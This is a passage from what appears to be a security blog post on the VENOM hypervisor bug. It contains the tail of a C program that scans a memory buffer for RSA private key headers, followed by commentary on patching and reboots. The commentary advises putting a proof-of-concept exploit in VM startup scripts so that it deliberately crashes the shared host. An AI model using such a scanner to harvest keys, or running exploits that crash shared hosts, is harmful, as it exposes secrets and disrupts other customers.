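    /* Report every offset where the PEM header appears. */
    const char *needle = "-----BEGIN RSA PRIVATE KEY-----";
    size_t nlen = strlen(needle);
    for (char *p = buf; (p = memmem(p, len - (p - buf), needle, nlen)); p++)
        printf("possible RSA private key at offset %ld\n", (long)(p - buf));

    free(buf);
    return 0;
}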

I'm not sure how data centers are going to fix this, since they have to reboot the host systems to patch. Customers hate reboots -- many would rather suffer the danger than have their instance reboot. Some datacenters may be able to pause or migrate instances, which will make some customers happier.

By the way, once a PoC is released, you should probably add it to your VM's startup scripts. It'll likely crash the host, bringing all the VMs down. That's a good thing -- better to crash the host than allow it to be exploited.

By the way, we in the security community are a bit offended by the exploit-sploitation by CrowdStrike (VENOM! With logo!!), but yeah, it's still a great find and a serious bug.